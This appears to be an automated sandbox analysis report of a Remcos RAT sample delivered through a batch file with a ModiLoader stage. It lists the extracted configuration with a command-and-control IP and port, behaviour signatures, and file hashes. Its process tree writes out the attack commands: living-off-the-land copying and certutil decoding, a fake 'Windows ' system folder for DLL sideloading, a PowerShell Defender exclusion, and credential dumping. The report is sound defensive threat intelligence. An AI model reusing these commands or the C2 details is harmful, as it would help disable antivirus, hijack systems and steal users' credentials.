Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-04-2024 14:35

General

  • Target

    PO3488-0337.bat

  • Size

    3.9MB

  • MD5

    9a987344afb7334bd5fceeae97055408

  • SHA1

    946845c94b61847bf8cefeff153eaa4f9095f55f

  • SHA256

    985dda76570c9efdd692eca4a7bef55c99cbcac5ae7683360c115ea5529ebaa5

  • SHA512

    d212f4fc0db74da7754ef4830128db8bfb8239184a6cab2609bd251e0df4fc972d364a2dda7b0f790ec09930c200c6c96b0decd3203edd32aafdc492b78e3f17

  • SSDEEP

    49152:XgJ9GvW/Z22bISDp6JXl62tBW7Abb/1XaN+Nkn:i

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

192.3.216.142:7232

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PGR5EA

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 6 IoCs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1428
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
        PID:712
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1384
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:3340
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat" "C:\\Users\\Public\\Yano.txt" 9
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1052
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat" "C:\\Users\\Public\\Yano.txt" 9
            3⤵
            • Executes dropped EXE
            PID:4508
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1264
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12
            3⤵
            • Executes dropped EXE
            PID:2168
        • C:\Users\Public\Libraries\Yano.com
          C:\Users\Public\Libraries\Yano.com
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4600
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\LyjjreuvO.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2128
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
              4⤵
                PID:60
              • C:\Windows\SysWOW64\xcopy.exe
                xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                4⤵
                • Enumerates system info in registry
                PID:3412
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                4⤵
                  PID:3368
                • C:\Windows\SysWOW64\xcopy.exe
                  xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
                  4⤵
                  • Enumerates system info in registry
                  PID:2488
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  4⤵
                    PID:1356
                  • C:\Windows\SysWOW64\xcopy.exe
                    xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                    4⤵
                    • Enumerates system info in registry
                    PID:676
                  • C:\Windows \System32\easinvoker.exe
                    "C:\Windows \System32\easinvoker.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1612
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1768
                      • C:\Windows\system32\cmd.exe
                        cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2912
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                          7⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1688
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Yano.com C:\\Users\\Public\\Libraries\\Lyjjreuv.PIF
                  3⤵
                    PID:2996
                  • C:\Users\Public\Libraries\Yano.com
                    C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\ktpkhvfthsyqlgpjvgyjt"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4432
                  • C:\Users\Public\Libraries\Yano.com
                    C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\nndcioqndarvnudvmrlcwcml"
                    3⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook accounts
                    PID:464
                  • C:\Users\Public\Libraries\Yano.com
                    C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\xhivjybprijaybzzwbyehphuytnf"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1148
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del "C:\Users\Public\Yano.txt" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:4980
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:3372
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3812 --field-trial-handle=2272,i,11831746627654527593,10138103687018060346,262144 --variations-seed-version /prefetch:8
                1⤵
                  PID:692

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\remcos\logs.dat
                  Filesize

                  182B

                  MD5

                  4c6f9bc5f7cce91fb0fa69b146bbe6db

                  SHA1

                  c5939dca12352c003cfdb7e4ad84b9fc13d7d61d

                  SHA256

                  60d9aaec54eb8981261dd07fe04a3f922fdf0af3059a0eb63795f639e34ef97b

                  SHA512

                  f4855337828bc03d2f766e69c397d500d8e700ff291bae0a5563dd0aef0112ea02842ffbc868edfdd423efb1d4d6e8995d30e3d799541f126fa9dc36da62e73f

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ht5r0wdy.fhu.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\ktpkhvfthsyqlgpjvgyjt
                  Filesize

                  4KB

                  MD5

                  32100ea472bc470ba10f60a11c782c0e

                  SHA1

                  078aa6214b8ca1c3562774453abca6c8806a13c3

                  SHA256

                  d6132e01d239dbbe0f686e1a18cd57d7cf272e34ab03b7f483f5147c00d374ad

                  SHA512

                  df7aaa762f5546a9e783b5a15a9cd5a3e66ec43b5502b025d621f106e63008095461a96d5f1f06791cac6322e0c418eb6de476b6856338e2f5fc2d038ca10d6b

                • C:\Users\Public\Libraries\LyjjreuvO.bat
                  Filesize

                  29KB

                  MD5

                  828ffbf60677999579dafe4bf3919c63

                  SHA1

                  a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

                  SHA256

                  abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

                  SHA512

                  bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

                • C:\Users\Public\Libraries\Yano.com
                  Filesize

                  1.4MB

                  MD5

                  a77fc511951e177b19df5e7604d39006

                  SHA1

                  cfa9a6bf1f4cd3f652575c56821702e75e9ac0b4

                  SHA256

                  9537982a9501f4dd4474d080c147a5afa3f125f6617811486c6341cdba1aa2da

                  SHA512

                  1af66d8c0996fb61f8842b7a9616e1c84a646f2eefc776dcf4a36df0752efbd777bf7f35b4143c94991e6fed6f074a6f93be189a3506e4811c830ab40e450b39

                • C:\Users\Public\Libraries\aaa.bat
                  Filesize

                  18KB

                  MD5

                  f4e8f0ec6cfc5c6039402322685cb6ce

                  SHA1

                  1037835573c2886dda05d256f15306da89dc645e

                  SHA256

                  cd05094e213643d624996b98e14aa5f7a2363f63530fe0c99523f6948effe756

                  SHA512

                  c5f9dfbbdb437c8ef9e2dd53fcbafcb256ab4626b4637a21332b3112c20f0d5353674031aae21b57604ba80d3b3f51f11b0ed412ed5fa6641b32fc4793746e02

                • C:\Users\Public\Libraries\easinvoker.exe
                  Filesize

                  128KB

                  MD5

                  231ce1e1d7d98b44371ffff407d68b59

                  SHA1

                  25510d0f6353dbf0c9f72fc880de7585e34b28ff

                  SHA256

                  30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

                  SHA512

                  520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

                • C:\Users\Public\Libraries\netutils.dll
                  Filesize

                  112KB

                  MD5

                  30468939b69d5b1f29494fff5b161e6b

                  SHA1

                  3f900a76e5a00efd97c618c8cdaa55e66384618f

                  SHA256

                  7c6b2128913876dcb70603f2c00618d2e9057f381766565baf2a37100b85f1fd

                  SHA512

                  f59fc26b77b28bc0dce41f2542c95a0fcb32204cc2d840d7cf8e74e10fbfc238f0c360e3bb5d787f32c83668ad10bbe522e098ede52f178dd8555c7af530f27f

                • C:\Users\Public\Yano.txt
                  Filesize

                  2.8MB

                  MD5

                  870803b239f8eafe8c904002d071242a

                  SHA1

                  3636a93964cf42a9d9adbeb8fc91e73ddc9bea1f

                  SHA256

                  f7cdbc8097cfc5ad70a9d5337b4bf699b9980b64d73d17cdd419ca8bb560f8ac

                  SHA512

                  c065f4536ef7a932c6868689bd352a5cc6ed85f12ee5af540a7cfb537ae27d3e989c4a5d2a88521e66eb0efc385d8c24dde44befb91c224a4d259ca2ef888e6d

                • C:\Users\Public\alpha.exe
                  Filesize

                  283KB

                  MD5

                  8a2122e8162dbef04694b9c3e0b6cdee

                  SHA1

                  f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                  SHA256

                  b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                  SHA512

                  99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                • C:\Users\Public\kn.exe
                  Filesize

                  1.6MB

                  MD5

                  bd8d9943a9b1def98eb83e0fa48796c2

                  SHA1

                  70e89852f023ab7cde0173eda1208dbb580f1e4f

                  SHA256

                  8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                  SHA512

                  95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

                • memory/464-95-0x0000000000400000-0x0000000000462000-memory.dmp
                  Filesize

                  392KB

                • memory/464-99-0x0000000000400000-0x0000000000462000-memory.dmp
                  Filesize

                  392KB

                • memory/464-101-0x0000000000400000-0x0000000000462000-memory.dmp
                  Filesize

                  392KB

                • memory/464-106-0x0000000000400000-0x0000000000462000-memory.dmp
                  Filesize

                  392KB

                • memory/1148-112-0x0000000000430000-0x00000000004F9000-memory.dmp
                  Filesize

                  804KB

                • memory/1148-100-0x0000000000400000-0x0000000000424000-memory.dmp
                  Filesize

                  144KB

                • memory/1148-108-0x0000000000400000-0x0000000000424000-memory.dmp
                  Filesize

                  144KB

                • memory/1148-116-0x0000000000400000-0x0000000000424000-memory.dmp
                  Filesize

                  144KB

                • memory/1148-111-0x0000000000400000-0x0000000000424000-memory.dmp
                  Filesize

                  144KB

                • memory/1612-52-0x00000000613C0000-0x00000000613E3000-memory.dmp
                  Filesize

                  140KB

                • memory/1688-70-0x00007FF8CA600000-0x00007FF8CB0C1000-memory.dmp
                  Filesize

                  10.8MB

                • memory/1688-67-0x000001FE58BE0000-0x000001FE58BF0000-memory.dmp
                  Filesize

                  64KB

                • memory/1688-66-0x000001FE58BE0000-0x000001FE58BF0000-memory.dmp
                  Filesize

                  64KB

                • memory/1688-65-0x00007FF8CA600000-0x00007FF8CB0C1000-memory.dmp
                  Filesize

                  10.8MB

                • memory/1688-60-0x000001FE58D90000-0x000001FE58DB2000-memory.dmp
                  Filesize

                  136KB

                • memory/4432-125-0x0000000000400000-0x0000000000478000-memory.dmp
                  Filesize

                  480KB

                • memory/4432-91-0x0000000000400000-0x0000000000478000-memory.dmp
                  Filesize

                  480KB

                • memory/4432-96-0x0000000000400000-0x0000000000478000-memory.dmp
                  Filesize

                  480KB

                • memory/4432-102-0x0000000000400000-0x0000000000478000-memory.dmp
                  Filesize

                  480KB

                • memory/4432-105-0x0000000000400000-0x0000000000478000-memory.dmp
                  Filesize

                  480KB

                • memory/4600-32-0x0000000000400000-0x0000000000573000-memory.dmp
                  Filesize

                  1.4MB

                • memory/4600-128-0x00000000349F0000-0x0000000034A09000-memory.dmp
                  Filesize

                  100KB

                • memory/4600-85-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-84-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-83-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-90-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-80-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-79-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-78-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-76-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-75-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-89-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-86-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-87-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-30-0x0000000003E50000-0x0000000004E50000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-94-0x0000000000A30000-0x0000000000A31000-memory.dmp
                  Filesize

                  4KB

                • memory/4600-29-0x0000000003E50000-0x0000000004E50000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-131-0x00000000349F0000-0x0000000034A09000-memory.dmp
                  Filesize

                  100KB

                • memory/4600-133-0x00000000349F0000-0x0000000034A09000-memory.dmp
                  Filesize

                  100KB

                • memory/4600-134-0x00000000349F0000-0x0000000034A09000-memory.dmp
                  Filesize

                  100KB

                • memory/4600-135-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-137-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-138-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-28-0x0000000000A30000-0x0000000000A31000-memory.dmp
                  Filesize

                  4KB

                • memory/4600-145-0x00000000349F0000-0x0000000034A09000-memory.dmp
                  Filesize

                  100KB

                • memory/4600-149-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-150-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-160-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-161-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-171-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4600-172-0x0000000016310000-0x0000000017310000-memory.dmp
                  Filesize

                  16.0MB